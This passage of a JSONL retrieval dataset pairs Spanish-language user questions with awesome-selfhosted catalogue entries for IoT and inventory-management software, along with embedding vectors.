"v": [-0.06915, 0.09071, -0.14896, -0.00793, 0.00496, -0.04715, 0.0454, -0.02223, -0.10082, -0.17622, -0.04886, -0.08444, 0.09668, -0.02094, 0.10399, -0.02973, 0.06675, -0.23768, -0.06154, -0.01012, -0.07782, -0.16065, -0.03876, -0.02751, 0.0217, 0.03804, 0.07317, -0.05075, -0.21006, 0.03503, 0.1224, 0.05736, 0.12919, -0.11322, -0.07428, -0.15265, -0.00802, -0.04029, 0.07575, 0.04207, 0.05658, -0.01781, -0.02986, -0.00693, -0.00288, 0.02067, -0.01954, -0.05118, 0.0078, -0.0384, -0.08048, -0.00103, -0.03202, -0.01109, -0.07207, -0.14225, 0.09735, -0.01255, 0.10062, -0.07517, -0.00496, 0.15676, -0.04018, -0.05791, 0.05163, 0.00488, -0.07414, -0.08213, -0.04771, -0.02399, -0.0266, -0.03197, -0.0399, 0.01179, 0.01547, 0.08122, 0.01323, 0.02014, 0.05458, 0.00391, 0.05586, 0.01134, -0.06374, 0.02891, -0.04623, -0.10463, 0.03299, -0.07987, 0.0068, -0.09112, 0.11638, 0.02829, 0.07031, 0.12378, 0.04769, -0.07499, 0.07063, 0.10008, -0.03416, -0.02445, 0.04765, 0.01397, -0.05656, 0.1732, -0.07343, -0.04335, 0.0785, -0.064, 0.07059, -0.0749, -0.03112, 0.01757, -0.07845, -0.06818, -0.14585, -0.09759, -0.08885, 0.00983, -0.02242, 0.00027, -0.07204, 0.02426, 0.04991, -0.00806, 0.11157, -0.03486, -0.00225, 0.06617, 0.04867, 0.06402, 0.0684, -0.05352, -0.01524, -0.02906, -0.02115, 0.02076, -0.02499, 0.02061, -0.0296, -0.0239, 0.0814, 0.09143, 0.06642, -0.07791, 0.00637, -0.01032, 0.03899, -0.07792, -0.07481, -0.0431, -0.02628, 0.09669, 0.04007, -0.02874, -0.111, -0.01263, 0.01545, -0.07293, 0.03992, 0.07194, -0.0531, 0.01437, -0.01221, -0.0015, -0.04381, 0.05497, -0.08738, -0.02908, 0.00333, 0.01332, -0.07283, 0.14015, 0.02255, -0.01195, 0.00185, -0.02397, -0.10175, -0.07345, 0.04756, -0.0271, -0.08128, 0.0508, -0.01898, 0.03807, 0.00886, -0.00665, -0.04519, 0.00902, 0.01272, 0.0191, 0.04434, 0.07278, -0.01454, 0.02619, -0.00883, -0.06178, -0.02532, -0.02993, 0.02032, 0.00272, -0.03859, 0.02011, 0.04564, -0.0536, 0.03888, 0.05327, 0.01683, 0.02044, 0.0534, 0.03589, 0.06222, -0.02558, 0.09638, -0.0202, 0.01472, 0.04653, -0.04792, -0.00418, -0.0247, 0.03533, 0.10075, 0.01465, 0.02509, 0.02226, -0.04925, 0.00435, 0.0028, 0.02162, 0.02788, 0.01584, -0.03188, 0.01185, 0.02878, -0.0257, 0.00521, 0.01571, 0.00819, -0.02708, -0.03448, -0.007, 0.04002, 0.07295, -0.00855, -0.03524, -0.02132, -0.07852, -0.06986, 0.01117, 0.02237, -0.08709, -0.0239, 0.05078, -0.00908, -0.06004, -0.01906, -0.0503]} +{"tipo": "pregunta", "herramienta": "Internet of Things (IoT)", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Internet of Things (IoT)", "tema": "internet of things (iot)", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Internet of Things (IoT): OpenRemote β€” IoT Asset management, Flow Rules and WHEN-THEN rules, Data visualization, Edge Gateway [AGPL-3.0, Java]. polluSensWeb β€” Web-based serial interface and charting tool for visualizing and logging data from UART pollution sensors (PM2.5, VOC, etc). Features live data acquisition, dynamic charts, CSV export, and webhook integration [MIT, Javascript]. SIP Irrigation Control β€” Open source software for sprinkler/irrigation control [GPL-3.0, Python]. SOLECTRUS β€” Photovoltaic dashboard that displays energy production and consumption with cost and savings calculations [AGPL-3.0, Docker]. Tasmota β€” Open source firmware for ESP devices. Total local control with quick setup and updates. Control using MQTT, Web UI, HTTP or serial. Automate using timers, rules or scripts. Integration with home automation solutions [GPL-3.0, C/C++]. Thingsboard β€” Open-source IoT Platform - Device management, data collection, processing and visualization [Apache-2.0, Java/Docker/K8S].", "indexar": "que programa puedo usar para controlar la irrigaciΓ³n de mi jardΓ­n desde casa?", "v": [-0.00117, 0.02267, -0.09, -0.05189, 0.02873, 0.01646, -0.02193, 0.06817, -0.02503, -0.05495, -0.01766, -0.12312, -0.01046, -0.1255, -0.06464, -0.06602, 0.10058, 0.01874, 0.02476, 0.04015, -0.07358, -0.01791, 0.09457, -0.03317, -0.14042, 0.01584, 0.1679, -0.08214, -0.10986, 0.06536, -0.01451, 0.02096, 0.1374, -0.03152, -0.07357, -0.08802, 0.0591, 0.09188, 0.04336, -0.02696, -0.05747, 0.01065, -0.00329, -0.02421, 0.05442, 0.03256, 0.1238, -0.04458, -0.1087, -0.01701, -0.16478, -0.04805, 0.02393, 0.03416, 0.06203, -0.11287, -0.05141, -0.12913, 0.03449, -0.00972, -0.02788, 0.01594, 0.08749, 0.08085, -0.00743, -0.05092, 0.02707, 0.06387, -0.06847, -0.02833, 0.07763, -0.01704, -0.04856, 0.0129, -0.06696, 0.02609, 0.01421, -0.08529, 0.0632, -0.02866, -0.08655, -0.05342, -0.003, -0.01804, 0.02515, -0.07564, -0.05005, -0.12127, -0.04464, -0.06872, -0.02081, -0.05753, 0.03019, 0.05385, 0.04925, -0.13884, 0.03355, 0.11016, 0.05078, -0.0185, 0.10226, -0.09489, 0.00345, 0.17796, 0.02623, 0.03173, 0.11343, -0.01059, -0.1464, -0.0118, -0.09547, 0.01984, -0.11395, -0.1152, -0.0398, 0.0951, -0.07938, -0.00788, 0.07175, -0.0761, -0.06187, 0.04435, 0.07444, -0.01431, 0.08937, -0.08417, 0.04262, 0.04525, -0.05069, 0.10206, -0.07117, 0.00595, -0.04879, -0.06006, 0.07284, 0.04082, -0.08125, -0.03502, -0.05052, -0.00801, -0.04618, 0.05712, -0.01582, -0.07788, 0.09993, -0.0803, -0.07549, 0.00657, -0.00744, 0.02446, 0.08529, 0.03568, 0.05039, 0.01443, 0.05171, -0.03155, 0.04671, -0.0119, -0.03858, 0.0362, -0.11856, 0.02834, -0.03, -0.04222, 0.06062, -0.00928, 0.09226, -0.00696, 0.00609, 0.10839, -0.08089, 0.07194, -0.03382, -0.04574, -0.01281, -0.06268, 0.01045, -0.01652, 0.04132, -0.02408, -0.06838, 0.06181, -0.04797, -0.05973, -0.01033, 0.0646, -0.05692, 0.06987, 0.00884, -0.01158, -0.09603, 0.06886, 0.02316, -0.04598, 0.00585, 0.00502, -0.00829, -0.01568, 0.04363, -0.06774, -0.0218, -0.03807, 0.01993, -0.00737, 0.10671, 0.02012, 0.01225, -0.00972, -0.0412, 0.05205, 0.05772, -0.01291, 0.11806, 0.05969, -0.04355, 0.03458, -0.00442, 0.00835, 0.04858, 0.00699, 0.10053, 0.03156, -0.02702, -0.00029, -0.00064, -0.02752, -0.05519, -0.00029, 0.03974, 0.07908, -0.05826, -0.08481, 0.0429, -0.00065, 0.03338, -0.11209, 0.01744, -0.09065, -0.04629, -0.02183, -0.06291, 0.07371, 0.04575, -0.01641, -0.05857, -0.03691, -0.11027, 0.01109, -0.00096, 0.01496, 0.04097, 0.01433, 0.0213, -0.0873, 0.00693, 0.08724]} +{"tipo": "pregunta", "herramienta": "Internet of Things (IoT)", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Internet of Things (IoT)", "tema": "internet of things (iot)", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Internet of Things (IoT): OpenRemote β€” IoT Asset management, Flow Rules and WHEN-THEN rules, Data visualization, Edge Gateway [AGPL-3.0, Java]. polluSensWeb β€” Web-based serial interface and charting tool for visualizing and logging data from UART pollution sensors (PM2.5, VOC, etc). Features live data acquisition, dynamic charts, CSV export, and webhook integration [MIT, Javascript]. SIP Irrigation Control β€” Open source software for sprinkler/irrigation control [GPL-3.0, Python]. SOLECTRUS β€” Photovoltaic dashboard that displays energy production and consumption with cost and savings calculations [AGPL-3.0, Docker]. Tasmota β€” Open source firmware for ESP devices. Total local control with quick setup and updates. Control using MQTT, Web UI, HTTP or serial. Automate using timers, rules or scripts. Integration with home automation solutions [GPL-3.0, C/C++]. Thingsboard β€” Open-source IoT Platform - Device management, data collection, processing and visualization [Apache-2.0, Java/Docker/K8S].", "indexar": "cual es una herramienta gratuita para visualizar datos de sensores de contaminaciΓ³n del aire en tiempo real?", "v": [0.00874, 0.02109, -0.06231, -0.15173, -0.04437, -0.0765, -0.14241, -0.01662, -0.02146, -0.02095, -0.09772, -0.11489, 0.0215, -0.06928, 0.11736, 0.05607, 0.10119, -0.09369, -0.02817, 0.02459, -0.01259, -0.09921, -0.10651, -0.02031, -0.11774, 0.07045, -0.01558, 0.01603, -0.18158, 0.04164, 0.01594, 0.01607, 0.11715, 0.02351, -0.18794, -0.08602, -0.01358, 0.09864, 0.00756, -0.07729, 0.05489, 0.03284, -0.06515, 0.03769, 0.05704, -0.05166, -0.08867, 0.02188, -0.05849, -0.0334, -0.08197, 0.03997, -0.02854, 0.03256, 0.03991, -0.16333, 0.19629, -0.07858, 0.06737, -0.12479, -0.04811, 0.10806, 0.06415, -0.00855, -0.04459, -0.04431, 0.12626, 0.0203, -0.01755, -0.01575, 0.04979, -0.09394, 0.11136, -0.08804, 0.0252, -0.07068, 0.00165, 0.0276, -0.04431, -0.00113, 0.04418, 0.00878, -0.00029, -0.03183, -0.00205, -0.05288, 0.0597, -0.04347, -0.02338, -0.01344, -0.0734, 0.15466, 0.08984, 0.11438, 0.04585, 0.05478, 0.08788, -0.06042, -0.08833, 0.14513, 0.1195, 0.02843, -0.11776, 0.0176, 0.03003, 0.00048, -0.01593, -0.0978, -0.04738, -0.04488, -0.07787, -0.05457, 0.01566, -0.07905, 0.05217, -0.08362, 0.02792, -0.18099, -0.11283, -0.01282, 0.01011, -0.00827, -0.02379, -0.04574, -0.0255, 0.01946, -0.07906, -0.01189, 0.01542, 0.02078, -0.02897, 0.03621, -0.06804, -0.04597, 0.02102, -0.0228, -0.06013, -0.08335, -0.00919, -0.05518, -0.03863, 0.08428, -0.00677, 0.00727, 0.02436, 0.01824, -0.02689, -0.002, -0.13233, -0.05479, 0.03127, -0.06468, 0.04297, 0.0321, 0.03467, 0.04091, 0.02059, -0.003, -0.0897, -0.08745, -0.00356, 0.00295, 0.00649, 0.00231, 0.07296, -0.05584, 0.12086, -0.01552, 0.05141, 0.00534, -0.00436, 0.00156, 0.04021, -0.04401, 0.01177, 0.01106, 0.00278, -0.10912, 0.02764, -0.09064, -0.00858, 0.00959, -0.03346, -0.03439, 0.00922, 0.00745, 0.04242, 0.0215, -0.02424, 0.01849, 0.02922, 0.01968, 0.04996, 0.03378, 0.05941, -0.03605, 0.02788, -0.09729, -0.02482, -0.01792, -0.05252, -0.06248, -0.0448, -0.01318, 0.00581, 0.05814, 0.00648, 0.03395, 0.03964, -0.02869, -0.00603, -0.00904, 0.00221, -0.08368, -0.04387, 0.04467, 0.06524, -0.0473, 0.01931, -0.00243, 0.04987, 0.01094, 0.13037, -0.03826, -0.02893, -0.06898, 0.05807, 0.06552, 0.05336, -0.07017, -0.03959, -0.00515, 0.01995, -0.024, 0.01068, 0.03024, 0.02897, -0.02035, -0.04897, -0.09153, -0.00621, 0.0886, 0.00115, -0.05354, -0.0233, -0.00404, -0.03216, -0.00116, 0.01058, -0.09702, -0.05494, -0.02339, 0.06521, 0.01556, 0.02909, -0.04673]} +{"tipo": "pregunta", "herramienta": "Internet of Things (IoT)", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Internet of Things (IoT)", "tema": "internet of things (iot)", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Internet of Things (IoT): OpenRemote β€” IoT Asset management, Flow Rules and WHEN-THEN rules, Data visualization, Edge Gateway [AGPL-3.0, Java]. polluSensWeb β€” Web-based serial interface and charting tool for visualizing and logging data from UART pollution sensors (PM2.5, VOC, etc). Features live data acquisition, dynamic charts, CSV export, and webhook integration [MIT, Javascript]. SIP Irrigation Control β€” Open source software for sprinkler/irrigation control [GPL-3.0, Python]. SOLECTRUS β€” Photovoltaic dashboard that displays energy production and consumption with cost and savings calculations [AGPL-3.0, Docker]. Tasmota β€” Open source firmware for ESP devices. Total local control with quick setup and updates. Control using MQTT, Web UI, HTTP or serial. Automate using timers, rules or scripts. Integration with home automation solutions [GPL-3.0, C/C++]. Thingsboard β€” Open-source IoT Platform - Device management, data collection, processing and visualization [Apache-2.0, Java/Docker/K8S].", "indexar": "necesito software open source para gestionar y monitorear dispositivos IoT como termostatos o luces inteligentes.", "v": [0.10707, -0.04833, -0.24649, -0.18701, 0.12893, -0.12778, -0.15636, -0.01189, -0.0977, -0.02717, -0.12844, -0.08428, 0.01637, 0.06387, -0.02178, 0.02056, 0.16397, -0.18502, -0.06393, -0.05485, -0.08332, 0.01246, -0.11851, -0.06861, -0.0281, 0.10281, -0.03487, -0.00771, -0.09659, 0.07686, -0.09878, -0.1025, 0.04055, -0.03445, -0.18515, -0.11963, -0.04804, 0.03854, 0.03023, 0.02772, 0.00953, 0.04395, 0.02491, 0.04306, 0.23387, -0.00873, 0.05698, -0.05993, 0.05903, -0.01232, -0.16546, -0.01108, 0.00585, 0.05572, -0.05233, -0.01677, 0.14668, -0.02476, 0.12858, -0.11991, -0.09551, 0.00356, 0.04001, -0.02509, -0.08814, 0.02271, -0.01244, 0.07628, -0.02183, -0.02976, -0.03082, 0.03797, -0.03906, 0.07793, 0.06709, 0.10281, -0.0927, -0.0282, 0.08572, -0.02161, -0.05164, 0.03575, 0.05095, -0.04597, -0.00523, -0.06926, 0.04486, 0.02208, -0.05464, 0.01142, -0.06634, 0.04975, 0.05082, -0.03407, 0.08066, 0.07612, 0.07778, 0.03624, 0.01259, 0.11049, -0.01243, -0.02305, -0.08205, 0.09913, -0.03392, 0.02504, 0.03723, -0.06843, 0.00901, -0.07588, -0.06821, 0.00069, -0.00859, -0.03156, 0.00504, 0.04441, -0.02806, -0.09861, 0.01496, 0.06744, -0.04419, -0.07893, 0.06374, 0.0051, 0.10922, -0.00235, 0.01314, 0.01548, 0.04973, -0.04437, 0.0544, -0.10111, -0.00532, -0.05978, -0.04999, 0.0443, -0.01583, -0.02615, -0.02391, -0.01357, -0.0471, 0.06149, 0.00453, -0.01652, 0.09968, -0.06833, -0.02097, 0.06075, 0.00112, 0.03528, 0.01744, 0.01458, -0.02772, 0.02737, -0.06911, -0.01276, 0.00841, -0.03624, -0.07937, 0.015, -0.06292, -0.04159, -0.00622, -0.00802, -0.02454, 0.01681, 0.01454, 0.07489, 0.05196, 0.02376, -0.05803, 0.11051, -0.05627, 0.0909, 0.02091, -0.04847, 0.01305, -0.01924, -0.00594, -0.05053, -0.02993, 0.02217, 0.02005, 0.01738, 0.03111, 0.08181, 0.00408, -0.04556, 0.01299, 0.03424, 0.00905, 0.02168, 0.00134, 0.04738, 0.10692, -0.03937, -0.01539, -0.03263, -0.04671, 0.07849, -0.03887, 0.04383, 0.03674, -0.0189, 0.02712, 0.02929, -0.02352, 0.07776, 0.02186, 0.0319, -0.00515, -0.0185, 0.06184, 0.01052, -0.04241, 0.01202, -0.00639, 0.03784, -0.01004, -0.01399, 0.0451, -0.02714, -0.02089, 0.01672, 0.01928, 0.05132, 0.02274, 0.07717, -0.01109, -0.0648, -0.01891, -0.01601, 0.00447, 0.00967, -0.02569, -0.02442, -0.04444, -0.00227, 0.00638, 0.01273, -0.05019, 0.05211, 0.0377, -0.04917, -0.00505, -0.06623, -0.04895, 0.00377, -0.01602, -0.08428, -0.05648, 0.02441, 0.00752, -0.03383, 0.00815, -0.01694]} +{"tipo": "pregunta", "herramienta": "Internet of Things (IoT)", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Internet of Things (IoT)", "tema": "internet of things (iot)", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Internet of Things (IoT): WebThings Gateway β€” WebThings is an open source implementation of the Web of Things, including the WebThings Gateway and the WebThings Framework [MPL-2.0, Nodejs].", "indexar": "que programa puedo usar para conectar dispositivos IoT a la web", "v": [-0.043, 0.07778, -0.23946, -0.16469, 0.13658, -0.08596, -0.07721, -0.04359, -0.10736, -0.02062, -0.12986, -0.11701, -0.0286, 0.01408, -0.0853, 0.00778, 0.14879, -0.10074, -0.02228, -0.12726, -0.03338, 0.06458, -0.07414, -0.00908, -0.06217, 0.17809, 0.04021, 0.08075, -0.11034, -6e-05, -0.06302, -0.0669, 0.07079, 0.02211, -0.16575, -0.14072, -0.04068, 0.1327, 0.05593, -0.01203, 0.04333, 0.03268, -0.05132, 0.08026, 0.19157, 0.05531, 0.06887, -0.11336, -0.03377, -0.00714, -0.13032, -0.00876, -0.0764, 0.03672, -0.1047, -0.02643, 0.13415, -0.12752, 0.05257, -0.03124, -0.0801, -0.0014, -0.02205, -0.01658, -0.01905, -0.0047, -0.06802, 0.11017, -0.06772, 0.00339, 0.08212, -0.00481, -0.03309, 0.05063, 0.08333, 0.16618, -0.04043, -0.06118, 0.10211, -0.01248, -0.07337, -0.01561, 0.10698, -0.01203, -0.05223, 0.046, 0.02082, 0.01813, 0.0174, -0.04877, -0.02265, 0.08527, 0.01453, -0.11101, 0.0225, -0.05299, 0.05421, -0.00229, 0.05126, 0.04673, 0.03391, 0.02964, -0.09865, 0.10973, -0.01529, -0.01421, 0.07029, -0.01527, -0.0302, -0.01113, -0.03308, -0.04611, -0.03143, -0.10505, -0.03132, 0.04779, 0.00036, -0.09791, 0.0238, 0.0332, -0.04799, -0.00156, 0.0383, 0.02498, 0.08945, 0.07084, -0.01953, 0.086, 0.01462, -0.02226, 0.10855, 0.00918, -0.03056, -0.06605, -0.08044, 0.00693, 0.0052, -0.09991, 0.00991, 0.01126, 0.03164, 0.02602, -0.06865, 0.00084, 0.0588, -0.07343, -0.04373, 0.01361, -0.01173, 0.05223, 0.01696, 0.04355, -0.08713, 0.00746, -0.06695, -0.02224, 0.02246, -0.04487, -0.04328, 0.03731, -0.09414, -0.02336, 0.02136, -0.02358, 0.00115, 0.00854, -0.01686, 0.03806, 0.10209, 0.0622, -0.04432, 0.11295, -0.0012, 0.02635, 0.00235, -0.01707, 0.00155, 0.00787, 0.03588, -0.06103, -0.08958, -0.00506, 0.04149, -0.03813, 0.03926, 0.05751, -0.01325, -0.00461, -0.03155, 0.05086, -0.02065, 0.01576, 0.03492, 0.07447, 0.05086, -0.06918, -0.01563, -0.05186, -0.01507, 0.04726, -0.04756, -0.0004, 0.01894, 0.0108, 0.05574, 0.05884, -0.03544, -0.01223, 0.05245, 0.05252, 0.00302, -0.07481, 0.07229, -0.0136, -0.02948, -0.01198, -0.02158, 0.01776, -0.01221, 0.02564, 0.02408, -0.00633, -0.02688, 0.04586, 0.03692, 0.01965, -0.012, -0.00718, -0.00929, -0.04576, -0.01462, -0.03698, -0.00694, -0.03286, -0.02438, -0.0133, -0.03218, -0.02105, -0.0565, 0.00244, -0.05773, 0.08606, 0.01691, -0.00801, -0.00692, -0.04478, -0.09057, -0.00096, -0.02593, -0.05336, -0.03067, 0.05, 0.06903, -0.0401, -0.00695, 0.06049]} +{"tipo": "pregunta", "herramienta": "Internet of Things (IoT)", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Internet of Things (IoT)", "tema": "internet of things (iot)", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Internet of Things (IoT): WebThings Gateway β€” WebThings is an open source implementation of the Web of Things, including the WebThings Gateway and the WebThings Framework [MPL-2.0, Nodejs].", "indexar": "cual es una alternativa libre al gateway de cosas en casa", "v": [-0.01827, 0.09123, -0.03013, 0.04028, -0.11894, -0.0597, -0.02813, -0.05269, -0.09127, -0.04293, -0.05124, -0.22859, -0.0711, 0.14843, 0.02378, 0.00414, 0.12713, 0.04465, 0.07789, -0.08241, -0.12048, 0.10256, -0.01042, -0.09314, -0.0711, -0.15038, 0.15567, 0.04228, -0.09254, 0.08423, 0.01812, -0.04862, 0.05863, -0.05896, -0.0547, 0.00068, 0.12845, 0.09529, 0.12858, -0.08152, 0.02996, -0.0562, -0.08134, 0.12448, 0.01345, -0.13352, -0.02634, -0.0221, -0.07149, 0.02004, -0.16896, -0.11576, -0.05663, 0.04696, 0.09014, 0.04057, 0.15354, -0.12213, -0.00115, 0.01211, -0.1317, 0.03901, 0.037, -0.03605, -0.06456, -0.01585, -0.03858, 0.04605, 0.02277, 0.02615, 0.05911, 0.0052, 0.0408, -0.02754, -0.15376, 0.06953, -0.03852, -0.06484, -0.02874, 0.06879, 0.06091, -0.06065, -0.01518, 0.03578, 0.03901, -0.10561, 0.01194, -0.10739, 0.05088, -0.03232, -0.0088, 0.00234, -0.00474, 0.14574, -0.00315, -0.10828, 0.03798, 0.05666, 0.03396, 0.0172, 0.05254, -0.04677, -0.076, 0.05443, 0.04792, -0.06667, -0.02825, -0.01062, -0.06163, -0.01177, -0.00262, 0.14111, -0.04003, 0.01394, -0.02764, 0.00888, -0.06203, -0.00149, -0.01496, -0.03097, -0.0934, -0.02714, -0.01507, -0.07787, -0.0289, -0.01671, 0.13128, 0.0139, -0.05849, 0.04216, 0.05025, -0.01545, -0.01947, -0.06915, -0.08038, -0.0267, -0.04428, -0.06604, 0.05919, -0.0224, -0.01158, 0.03378, 0.05374, -0.00784, 0.05356, -0.045, -0.0607, 0.01779, -0.11232, 0.04408, -0.10158, 0.00975, -0.03168, 0.03977, 0.0438, 0.01432, -0.08046, 0.0261, -0.01898, 0.04318, 0.01938, 0.04368, -0.00159, -0.05254, -0.03668, 0.02379, 0.02123, 0.02464, -0.06706, 0.04306, -0.0521, 0.07955, 0.01243, -0.05717, 0.00446, -0.07554, -0.00637, -0.04141, -0.04844, -0.04693, 0.05338, -0.0065, -0.11949, -0.0053, 0.01116, 0.01561, -0.00799, 0.0352, -0.00574, -0.02365, -0.08611, -0.05546, -0.11026, -0.03982, -0.06054, -0.01618, 0.03427, -0.12785, 0.07118, 0.01535, -0.07411, -0.11529, 0.10152, -0.02706, 0.00505, 0.01933, 0.00223, -0.06181, 0.01301, 0.06349, 0.05992, -0.03999, 0.06882, 0.00935, -0.05449, 0.01219, -0.02969, -0.02332, 0.01034, 0.03968, 0.08458, 0.02818, -0.04496, -0.03207, 0.0052, 0.03562, 0.00903, 0.00215, -0.05899, 0.01157, 0.02382, -0.05513, 0.04546, 0.0427, 0.01881, -0.01539, -0.05128, 0.03463, 0.04302, -0.01057, -0.00753, 0.05396, 0.00036, 0.03026, 0.00807, 0.0043, -0.04239, -0.04879, 0.01234, -0.03139, -0.05477, -0.03244, -0.01209, 0.03193, 0.02701, 0.03581]} +{"tipo": "pregunta", "herramienta": "Internet of Things (IoT)", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Internet of Things (IoT)", "tema": "internet of things (iot)", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Internet of Things (IoT): WebThings Gateway β€” WebThings is an open source implementation of the Web of Things, including the WebThings Gateway and the WebThings Framework [MPL-2.0, Nodejs].", "indexar": "con que herramienta gestiono el ecosistema WebThings", "v": [-0.00145, -0.01266, -0.01888, -0.24565, 0.09369, -0.06208, -0.12849, -0.01768, 0.03337, -0.10167, -0.1393, 0.01756, -0.01926, -0.00162, 0.06491, 0.14425, 0.13476, -0.16457, -0.01416, -0.06281, -0.09617, 0.09137, -0.05608, 0.07053, -0.03, -0.09062, -0.0166, -0.05821, -0.07728, 0.14226, 0.01459, 0.09919, 0.01972, -0.04402, -0.05802, 0.00844, -0.03982, 0.04949, -0.03039, -0.09105, -0.06092, 0.06717, -0.05486, 0.00901, 0.04624, 0.00465, 0.00973, -0.04446, 0.02393, 0.02274, -0.13719, -0.11372, -0.23158, -0.04175, 0.08645, -0.05059, 0.18321, -0.20507, 0.03975, -0.1009, -0.11884, 0.09384, -0.0399, 0.00904, -0.07294, -0.05093, 0.01815, 0.00269, -0.08462, 0.09496, -0.00834, -0.02246, 0.08521, 0.02167, 0.09731, 0.00916, 0.07828, 0.06562, -0.00584, -0.03153, 0.00234, -0.05352, -0.02965, 0.04455, -0.09844, -0.09656, 0.01348, -0.08756, 0.00734, -0.06639, -0.06369, -0.00753, -0.03152, -0.00859, -0.02029, -0.04715, 0.05342, -0.06094, -0.006, 0.0225, 0.08136, -0.00867, -0.13995, 0.04209, -0.02325, 0.06858, 0.03319, -0.04924, -0.09475, 0.03579, -0.00339, -0.01691, 0.07329, -0.01877, 0.03728, 0.10874, 0.00158, -0.03878, 0.05533, -0.04999, -0.00879, 0.03151, -0.01227, -0.07033, 0.01188, 0.08791, -0.02041, 0.05661, 0.05815, -0.09339, -0.03785, -0.0496, -0.07177, 0.06707, 0.00997, 0.00839, -0.00964, -0.06232, 0.05759, 0.01805, -0.07935, 0.02643, -0.07123, -0.04681, 0.07066, -0.01678, 0.02048, -0.04368, -0.0757, 0.02901, 0.02526, -0.03756, -0.04776, -0.01945, -0.13873, -0.00249, -0.0914, 0.05597, -0.06286, -0.0367, -0.00294, -0.0914, 0.0644, 0.05429, 0.0647, -0.0053, 0.06051, -0.00116, 0.01357, 0.05581, 0.04547, 0.05516, 0.01422, -0.048, -0.00248, -0.0633, -0.02453, -0.06225, 0.07599, -0.03195, -0.07041, -0.01282, -0.00523, 0.03489, -0.01407, -0.04413, -0.02127, 0.04049, -0.07248, 0.12921, 0.0493, 0.06021, 0.01227, -0.01914, 0.08697, 0.03913, -0.01925, -0.06427, -0.00337, 0.03307, -0.0252, -0.01391, -0.01602, -0.05762, -0.01672, 0.09408, -0.00483, -0.01664, -0.01343, 0.0525, 0.01286, -0.02043, 0.02164, -0.00676, 0.00841, -0.04302, 0.0174, 0.0406, -0.02185, 0.01798, 0.05126, 0.00088, 0.06947, -0.00273, -0.01308, -0.01382, -0.0321, 0.00427, 0.02607, -0.0484, -0.0185, -0.09754, -0.0153, -0.01039, 0.00895, -0.02514, 0.06637, -0.03774, -0.08253, -8e-05, -0.06517, 0.03054, 0.01006, -0.01236, -0.02597, -0.05542, -0.05442, -0.01633, -0.0392, -0.07406, -0.04913, -0.02458, 0.02146, -0.0158, -0.00669, -0.01621]} +{"tipo": "pregunta", "herramienta": "Inventory Management", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Inventory Management", "tema": "inventory management", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Inventory Management: Cannery β€” Firearm and ammunition tracker app [AGPL-3.0, Docker]. DVinyl β€” Modern collection manager for physical media (vinyls, CDs, cassettes, books, movies, and video games) [⚠, MIT, Nodejs/Docker]. HomeBox (SysAdminsMedia) β€” Inventory and organization system built for the home user [AGPL-3.0, Docker/Go]. Inventaire β€” Collaborative resources mapper project, while yet only focused on exploring books mapping with wikidata and ISBNs [AGPL-3.0, Nodejs]. Inventree β€” Inventory management system which provides intuitive parts management and stock control [MIT, Python]. Open QuarterMaster β€” Powerful inventory management system, designed to be flexible and scalable [GPL-3.0, deb/Docker]. Part-DB β€” Inventory management system for your electronic components [AGPL-3.0, Docker/PHP/Nodejs]. Shelf β€” Asset and equipment tracking software used by teams who value clarity. Shelf is an asset database and QR asset label generator that lets you create, manage and overview your assets across locations. Unlimited assets, free forever [AGPL-3.0, Nodejs].", "indexar": "ΒΏHay alguna alternativa libre para gestionar el inventario de mis repuestos electrΓ³nicos?", "v": [0.09706, 0.11767, -0.06681, -0.07519, 0.01758, -0.05051, -0.00399, -0.01121, -0.22138, -0.12122, -0.09121, -0.17995, 0.03215, 0.08962, 0.14568, 0.00948, 0.07026, -0.16574, 0.01627, -0.01028, -0.12049, 0.13721, -0.08651, -0.00834, -0.06327, 0.02282, -0.147, 0.09103, -0.13855, 0.15184, 0.06374, 0.0567, 0.0584, -0.06579, -0.06932, 0.05547, 0.19892, 0.10583, 0.11727, -0.10029, 0.15552, -0.01788, -0.0749, -0.07524, 0.01652, -0.14764, 0.04174, 0.00072, 0.0042, 0.11691, -0.05241, 0.00128, -0.13003, 0.00647, 0.13497, -0.0484, 0.12237, -0.04931, 0.09898, -0.07778, -0.03172, 0.01118, 0.07359, 0.0271, -0.0087, 0.04515, -0.04275, -0.05506, -0.13777, 0.08163, -0.01465, 0.02131, 0.00892, -0.05772, -0.04934, 0.0184, 0.01266, 0.03823, -0.01481, 0.05745, 0.03631, -0.1009, 0.10542, -0.005, 0.00979, -0.11905, 0.0414, -0.02256, -0.02218, -0.0071, 0.02203, 0.00031, -0.08061, 0.00065, 0.00511, 0.01278, -0.04262, 0.0864, -0.0329, 0.1339, 0.10012, 0.07231, -0.00821, 0.04384, -0.11813, 0.01794, 0.01844, 0.00836, 0.06431, -0.02155, -0.08319, -0.01668, 0.0, 0.00132, -0.03237, 0.04977, 0.02515, 0.0379, 0.01201, 0.09525, -0.01213, -0.04041, 0.04206, -0.06922, 0.11625, 0.00076, 0.05777, 0.03098, -0.00368, 0.02898, 0.03179, -0.09133, 0.00076, -0.10902, -0.05416, -0.00581, 0.00052, -0.00246, -0.02122, -0.04169, -0.06256, 0.02067, 0.02048, -0.05657, 0.01941, -0.08383, 0.07171, -0.00082, 0.0086, 0.00865, -0.01312, 0.02401, -0.01848, 0.15286, -0.01014, 0.09458, -0.00284, -0.01724, -0.05346, 0.00217, -0.02262, -0.0154, -0.02309, 0.03589, -0.06426, -0.00294, -0.02379, 